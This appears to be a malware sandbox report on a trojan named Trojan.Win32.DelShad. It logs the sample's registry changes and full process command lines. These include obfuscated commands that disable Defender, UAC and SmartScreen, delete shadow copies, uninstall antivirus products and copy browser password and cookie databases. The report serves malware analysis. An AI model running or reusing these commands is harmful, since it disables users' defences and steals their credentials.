| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp" /SL5="$501BE,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp" /SL5="$601BE,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\pik.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\pik.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\tmp\.cmd" "
C:\Windows\system32\reg.exe
rEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F
C:\Windows\system32\reg.exe
reg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f
C:\Windows\system32\reg.exe
rEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f
C:\Windows\system32\reg.exe
reg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F
C:\Windows\system32\reg.exe
reG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f
C:\Windows\system32\reg.exe
reG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f
C:\Windows\system32\reg.exe
rEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
reG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F
C:\Windows\system32\reg.exe
reg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
reG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f
C:\Windows\system32\reg.exe
reg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f
C:\Windows\system32\reg.exe
rEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f
C:\Windows\system32\reg.exe
rEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f
C:\Windows\system32\icacls.exe
icaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C
C:\Windows\system32\icacls.exe
iCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c
C:\Windows\system32\vssadmin.exe
vssadmin dELETe shadOws /aLl /QuIEt
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\attrib.exe
aTTrIb +S +H C:\TMP
C:\Windows\system32\find.exe
find /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\System32\Wbem\WMIC.exe
wmic product where name="ESET Security" call uninstall /nointeractive
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\.cmd""
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
rp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
rP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
rP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Windows\system32\rEG.EXE
"C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
rp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEg.EXE
"C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEg.EXE
"C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Windows\system32\rEG.EXE
"C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\System32\Wbem\WMIC.exe
wmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\.cmd""
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip
C:\Windows\SysWOW64\curl.exe
CUrL -S ipINFO.io/Ip
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f
C:\Windows\system32\cmd.exe
cmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr
"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\ob7cfhzse9oqu7xo240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\zx14njk1cjdm240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\4a7e2c0lq5gi240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\i8isbple5q9z240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\4tcj2ww5i240651515.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\m0eesb0kzpngmd240661625.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\c6lq96fwvpih240661625.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\9dv01842bcf3zfv240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\q2rescb6240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\434n2sz6anbo50bs240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\qrr2ejo103240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\2rjjl1u3y2240683609.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\67koeg4x240690375.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\y63thibysbnp6i240690375.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\5oy242k24e240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\l2a139w1240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\jom9k7j13240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\2opxstaet240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\yf6pw5mchnd240696171.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\rgf72ajgb240705546.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\a388vq9la0kvz71240705546.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\4vt3u3tjt240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\tbzqz5bgb6240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\8cbcluskncja3240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\uetb77q1gtv240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\arxozshvs240714531.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ibgqcei52nq6amwa240720984.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\natpu47qqegcjqaw240720984.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\lz1l7ec52tnr78240727468.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\zslvhu8uvd240727468.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\vjohb7g5en8240727562.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\m7irgx4mlmnf1240727562.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
